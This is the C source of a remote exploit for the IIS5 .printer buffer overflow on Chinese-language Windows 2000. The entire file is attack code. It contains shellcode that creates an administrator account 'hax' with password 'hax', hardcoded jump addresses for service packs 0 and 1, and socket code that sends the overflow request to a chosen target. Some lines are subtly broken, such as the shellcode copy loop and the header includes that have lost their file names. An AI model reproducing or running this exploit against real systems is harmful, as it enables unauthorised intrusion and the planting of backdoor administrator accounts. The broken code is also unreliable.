| /*************************************************************/
/* IIS5 中文版.printer远程攻击程序 */
/* 在Win2k Advanced Server(中文版,5.00.2195)上测试成功 */
/* 使用方法:cniis [sp type] */
/* sp type: 0 ---- no SP (default) */
/* 1 ---- SP1 */
/* 如果攻击成功,会在攻击目标机上添加一个Administrators组的 */
/* 用户:hax,密码:hax */
/* */
/* v0.2 增加了对SP1的攻击支持 */
/* */
/* http://isno.yeah.net */
/*************************************************************/
#include
#include
#include
#include
#include
void usage(char* prog);
int main (int argc, char *argv[])
{
/* This shellcode add a Administrators User hax */
/* hax's password is also hax, write by isno,5.2001 */
unsigned char shellcode[] =
"\x90\x55\x53\x8B\xEC\x33\xDB\x53\x83\xEC\x3C\xB8"
"\x6E\x65\x74\x20\x89\x45\xC3\xB8\x75\x73\x65\x72"
"\x89\x45\xC7\xB8\x20\x68\x61\x78\x89\x45\xCB\x89"
"\x45\xCF\xB8\x20\x2F\x61\x64\x89\x45\xD3\xB8\x64"
"\x26\x6E\x65\x89\x45\xD7\xB8\x74\x20\x6C\x6F\x89"
"\x45\xDB\xB8\x63\x61\x6C\x67\x89\x45\xDF\xB8\x72"
"\x6F\x75\x70\x89\x45\xE3\xB8\x20\x41\x64\x6D\x89"
"\x45\xE7\xB8\x69\x6E\x69\x73\x89\x45\xEB\xB8\x74"
"\x72\x61\x74\x89\x45\xEF\xB8\x6F\x72\x73\x20\x89"
"\x45\xF3\xB8\x68\x61\x78\x20\x89\x45\xF7\xB8\x2F"
"\x61\x64\x64\x89\x45\xFB\x8D\x45\xC3\x50\xB8\xAD"
"\xAA\x01\x78\xFF\xD0\x8B\xE5\x5B\x5D\x03\x03\x03";
char sploit[857];
char request[]="GET /NULL.printer HTTP/1.0";
char *finger;
int i,X,sock;
int sp=0;
unsigned short serverport=htons(80);
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr attack;
WORD werd;
WSADATA wsd;
werd= MAKEWORD(2,0);
WSAStartup(werd,&wsd);
if(argc<2||argc>3) usage(argv[0]);
if(argc==3) sp=atoi(argv[2]);
nametocheck = gethostbyname (argv[1]);
memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
memset(sploit,0x00,857);
strcpy(sploit,request);
finger=&sploit[26];
*(finger++)=0x0d;
*(finger++)=0x0a;
*(finger++)='H';
*(finger++)='o';
*(finger++)='s';
*(finger++)='t';
*(finger++)=':';
*(finger++)=' ';
for(i=0;i<268;i++)
*(finger++)=(char)0x90;
if(sp==0)
{
/* jmp esp in User32.dll(5.0.2180.1)*/
*(finger++)=(char)0x2a;
*(finger++)=(char)0xe3;
*(finger++)=(char)0xe2;
*(finger++)=(char)0x77;
}
else
{
*(finger++)=(char)0x8b;
*(finger++)=(char)0x89;
*(finger++)=(char)0xe6;
*(finger++)=(char)0x77;
}
*(finger++)=(char)0x90;
*(finger++)=(char)0x90;
*(finger++)=(char)0x90;
*(finger++)=(char)0x90;
for(i=0;shellcode!=0x00;i++)
*(finger++)=shellcode;
*(finger++)=0x0d;
*(finger++)=0x0a;
*(finger++)=0x0d;
*(finger++)=0x0a;
*(finger++)=0x00;
/* printf(sploit); */
sock = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr = attack.s_addr;
serv_addr.sin_port = serverport;
X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
if(X!=0)
{
printf("Couldn't connect\n",inet_ntoa(attack));
exit(1);
}
send(sock, sploit, strlen(sploit),0);
Sleep(1000);
printf("\nSP type: %d\n",sp);
printf("\nShellcode sended!\n");
printf("If success,the target host will add a Admin User named hax,its passwd is hax.\n");
printf("Good luck!!!\n\n");
closesocket(sock);
return 0;
}
void usage(char* prog)
{
printf("\n%s -- IIS5 Chinese version .printer remote exploit\n",prog);
printf(" write by isno \n\n");
printf("Usage: %s [sp type] \n",prog);
printf("sp type: 0 ---- no SP (default) \n");
printf(" 1 ---- SP1 \n");
exit(1);
}
|
